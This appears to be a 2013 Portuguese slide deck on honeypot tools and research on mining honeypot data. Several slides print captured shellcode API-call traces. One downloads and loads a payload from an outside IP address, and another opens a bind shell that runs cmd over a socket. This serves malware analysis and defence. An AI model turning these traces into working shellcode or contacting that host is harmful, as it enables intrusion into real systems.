  • 9. 9Setembro / 2013phmatheus@msn.com • Qebek – Modificação do QEMU para monitorar todas as chamadas de sistema do Windows, permitindo analisar, depurar e monitorar a execução de ataques e de artefatos maliciosos. • Sebek – É um modulo do kernel instalado no Windows com o proposito de coletar informações sobre os artefatos maliciosos e os ataques contra os sistemas, ele permite a coleta de informações desde as teclas pressionadas até informações criptografadas. Alta Interatividade
  • 10. 10Setembro / 2013phmatheus@msn.com O Fluxo de um ataque Atacante Honeypot File System Base de Dados Binarios BitStream Sniffer
  • 11. 11Setembro / 2013phmatheus@msn.com • Uso dos dados de rede bruto para extração de informações • Estatística (Cukier et al. 2006) • Associação (Ohrui et al. 2010) • Agrupamento (Ghourabi et al. 2010) • Correlação com SVM (Song et al. 2011) • Longest Common Substring (Thakar et al. 2005) • Redes Neurais MLP e KNN (Grégio et al. 2007) Extração de informação de Honeypots
  • 12. 12Setembro / 2013phmatheus@msn.com • O que todos esses trabalhos trazem em comum é que utilizam os dados de rede para gerar as estatísticas, para efetuar o agrupamento, para criar as assinaturas e os padrões dos detectores de intrusão. Extração de informação de Honeypots
  • 13. 13Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? Base de Dados
  • 14. 14Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? Binarios
  • 15. 15Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? BitStream
  • 16. 16Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? [ { "call": "LoadLibraryA", "args" : [ "urlmon" ], "return" : "0x7df20000" }, { "call": "URLDownloadToFile", "args" : [ "", "http://189.29.132.79:6402/dkqc", "x.", "0", "0" ], "return": "0" }, { "call": "LoadLibraryA", "args" : [ "x." ], "return" : "0x00000000" }, { "call": "ExitThread", "args" : [ "0" ], "return": "0" } ]
  • 17. 17Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? [ { "call": "GetProcAddress", "args" : [ "", "CreateProcessA" ], "return" : "0x7c802367" }, { "call": "GetProcAddress", "args" : [ "", "ExitThread" ], "return" : "0x7c80c058" }, { "call": "GetProcAddress", "args" : [ "", "LoadLibraryA" ], "return" : "0x7c801d77" }, { "call": "LoadLibraryA", "args" : [ "ws2_32" ], "return" : "0x71a10000" },
  • 18. 18Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "call": "GetProcAddress", "args" : [ "", "WSASocketA" ], "return" : "0x71a18769" }, { "call": "GetProcAddress", "args" : [ "", "bind" ], "return" : "0x71a13e00" }, { "call": "GetProcAddress", "args" : [ "", "listen" ], "return" : "0x71a188d3" }, { "call": "GetProcAddress", "args" : [ "", "accept" ], "return" : "0x71a21028" },
  • 19. 19Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "call": "GetProcAddress", "args" : [ "", "closesocket" ], "return" : "0x71a19639" }, { "call": "WSASocket", "args" : [ "2", "1", "0", "0", "0", "0" ], "return": "66" }, { "call": "bind", "args" : [ "66", { "sin_family" : "2", "sin_port" : "12045", "sin_addr" : { "s_addr" : "0.0.0.0" }, "sin_zero" : " " }, "16" ], "return": "0" },
  • 20. 20Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "call": "listen", "args" : [ "66", "1" ], "return": "0" }, { "call": "accept", "args" : [ "66", { }, "" ], "return": "68" }, { "call": "CreateProcess", "args" : "", "cmd", "", "","1","0", "", "", { "cb" : "0", "lpReserved" : "0", "lpDesktop" : "0", "lpTitle" : "0", "dwX" : "0", "dwY" : "0", "dwXSize" : "0", "dwYSize" : "0", "dwXCountChars" : "0", "dwYCountChars" : "0", "dwFillAttribute" : "0", "dwFlags" : "0", "wShowWindow" : "0", "cbReserved2" : "0", "lpReserved2" : "0", "hStdInput" : "68", "hStdOutput" : "68", "hStdError" : "68" },
  • 21. 21Setembro / 2013phmatheus@msn.com Que informações podem ser extraídas ? { "hProcess" : "4711", "hThread" : "4712", "dwProcessId" : "4712", "dwThreadId" : "4714" } ], "return": "-1" }, { "call": "closesocket", "args" : [ "68" ], "return": "0" }, { "call": "closesocket", "args" : [ "66" ], "return": "0" }, { "call": "ExitThread", "args" : [ "0" ], "return": "0" } ]
  • 23. 23Setembro / 2013phmatheus@msn.com • M. Cukier, R. Berthier, S. Panjwani, and S. Tan, “A statistical analysis of attack data to separate attacks,” in Dependable Systems and Networks, 2006. DSN 2006. International Conference on, 2006, pp. 383–392. • M. Ohrui, H. Kikuchi, and M. Terada, “Mining association rules consisting of download servers from distributed honeypot observation,” in Network-Based Information Systems (NBiS), 2010 13th International Conference on, 2010, pp. 541–545. • X. Tang, “The generation of attack signatures based on virtual honeypots,” in Parallel and Distributed Computing, Applications and Technologies (PDCAT), 2010 International Conference on, 2010, pp. 435–439. • A. Ghourabi, T. Abbes, and A. Bouhoula, “Data analyzer based on data mining for honeypot router,” in Computer Systems and Applications (AICCSA), 2010 IEEE/ACS International Conference on, 2010, pp. 1–6. • J. Song, H. Takakura, Y. Okabe, and Y. Kwon, “Correlation analysis between honeypot data and ids alerts using one-class svm,” Intrusion Detection Systems, In Tech, pp. 173–193, 2011. • U. Thakar, S. Varma, and A. Ramani, “Honeyanalyzer–analysis and extraction of intrusion detection patterns & signatures using honeypot,” in Proceedings of the Second International Conference on Innovations in Information Technology, 2005. • A. Grégio, R. Santos, and A. Montes, “Evaluation of data mining techniques for suspicious network activity classification using honeypots data,” in Defense and Security Symposium. International Society for Optics and Photonics, 2007, pp. 657 006–657 006. • S. Kaiser, “Biclustering: Methods, Software and Application”, Munchen 2011, Disponível em: http://edoc.ub.uni-muenchen.de/13073/1/Kaiser_Sebastian.pdf Referências